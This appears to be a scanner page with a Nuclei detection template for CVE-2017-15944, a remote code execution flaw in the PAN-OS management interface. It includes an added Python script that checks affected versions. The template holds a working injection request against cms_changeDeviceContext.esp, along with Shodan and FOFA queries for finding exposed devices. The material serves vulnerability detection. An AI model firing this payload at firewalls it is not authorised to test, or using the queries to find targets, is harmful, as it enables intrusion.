Palo Alto Network PAN-OS - Remote Code Execution
ID: CVE-2017-15944
Severity: critical
Author: emadshanab,milo2012
Tags: cve2017,cve,kev,edb,rce,vpn,panos,globalprotect,paloaltonetworks
Description
Palo Alto Network PAN-OS and Panorama before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote attackers to execute arbitrary code via vectors involving the management interface.
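The affected ranges above are the practical input for a defender: given a fleet inventory of PAN-OS and Panorama versions, which devices still need the fix? The following Python is an added example, not part of the Nuclei template or of any Palo Alto Networks tooling. The fix boundaries are taken verbatim from the description; the hotfix-suffix format ("8.0.5-h2") and the sample inventory are constructed assumptions for illustration.

```python
"""Affected-version check for CVE-2017-15944.

Ranges from the advisory text: PAN-OS / Panorama before 6.1.19,
7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6.
Added example; not the template's or the vendor's code.
"""
import re
from typing import Dict, List, Optional, Tuple

# First fixed release in each affected release train (from the advisory text).
FIXED_RELEASES: Dict[Tuple[int, int], Tuple[int, int, int]] = {
    (6, 1): (6, 1, 19),
    (7, 0): (7, 0, 19),
    (7, 1): (7, 1, 14),
    (8, 0): (8, 0, 6),
}

# Assumed version-string shape: major.minor.patch with an optional "-hN"
# hotfix suffix. The advisory does not define this format; it is an assumption.
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-h(\d+))?$")


def parse_version(text: str) -> Optional[Tuple[int, int, int, int]]:
    """Parse 'major.minor.patch[-hN]' into (major, minor, patch, hotfix).

    Returns None for strings that do not match, so callers can flag
    unparseable inventory entries instead of silently treating them as safe.
    """
    m = _VERSION_RE.match(text.strip())
    if not m:
        return None
    major, minor, patch, hotfix = m.groups()
    return (int(major), int(minor), int(patch), int(hotfix or 0))


def is_affected(version: str) -> Optional[bool]:
    """True if the version falls in an affected range, False if it is at or
    past the fix (or in a train the advisory does not list), None if the
    version string cannot be parsed."""
    parsed = parse_version(version)
    if parsed is None:
        return None
    major, minor, patch, _hotfix = parsed
    train = (major, minor)
    if train in FIXED_RELEASES:
        # Fix boundaries sit at patch level, so the hotfix number is irrelevant.
        return (major, minor, patch) < FIXED_RELEASES[train]
    # "before 6.1.19" also covers every train older than 6.1.
    if train < (6, 1):
        return True
    # Trains newer than 8.0 are not named in the advisory.
    return False


def triage(inventory: List[Tuple[str, str]]) -> Dict[str, Optional[bool]]:
    """Map each hostname to its verdict for a list of (hostname, version) records."""
    return {host: is_affected(ver) for host, ver in inventory}


# Constructed sample inventory (hostnames and versions are made up).
SAMPLE_INVENTORY: List[Tuple[str, str]] = [
    ("fw-edge-01", "7.1.13"),
    ("fw-edge-02", "7.1.14"),
    ("fw-dc-01", "8.0.5-h2"),
    ("fw-dc-02", "8.0.6"),
    ("panorama-01", "6.1.18"),
    ("fw-lab", "8.1.0"),
    ("fw-odd", "unknown"),
]

if __name__ == "__main__":
    for host, verdict in triage(SAMPLE_INVENTORY).items():
        label = {True: "AFFECTED", False: "fixed/not listed", None: "unparseable"}[verdict]
        print(f"{host}: {label}")
```

Entries that fail to parse come back as None rather than False so that a malformed inventory record surfaces for manual review instead of being counted as patched.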
YAML Source
id: CVE-2017-15944

info:
  name: Palo Alto Network PAN-OS - Remote Code Execution
  author: emadshanab,milo2012
  severity: critical
  description: Palo Alto Network PAN-OS and Panorama before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote attackers to execute arbitrary code via vectors involving the management interface.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Apply the latest security patches and updates provided by Palo Alto Networks.
  reference:
    - https://www.exploit-db.com/exploits/43342
    - https://security.paloaltonetworks.com/CVE-2017-15944
    - http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html
    - https://nvd.nist.gov/vuln/detail/CVE-2017-15944
    - http://www.securitytracker.com/id/1040007
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2017-15944
    epss-score: 0.97314
    epss-percentile: 0.99875
    cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: paloaltonetworks
    product: pan-os
    shodan-query:
      - http.favicon.hash:"-631559155"
      - cpe:"cpe:2.3:o:paloaltonetworks:pan-os"
    fofa-query: icon_hash="-631559155"
  tags: cve2017,cve,kev,edb,rce,vpn,panos,globalprotect,paloaltonetworks

http:
  - raw:
      - |
        GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337"; HTTP/1.1
        Host: {{Hostname}}
        Cookie: PHPSESSID={{randstr}};

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "@start@Success@end@"

      - type: status
        status:
          - 200
# digest: 4b0a004830460221009f5ad49fee6591e6494df36c388abcaecf0fd830fa9f4d63b85e8236c5187101022100b2257f55fa8dcea9dc861b3fb9f07723d1ac00fd17e605fb37b9a53f703f3c79:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template detects the vulnerability by sending the single request above to the management interface and matching the response body and status code. Run it against a target with the Nuclei tool:
$ nuclei -u "URL" -t "http/cves/2017/CVE-2017-15944.yaml"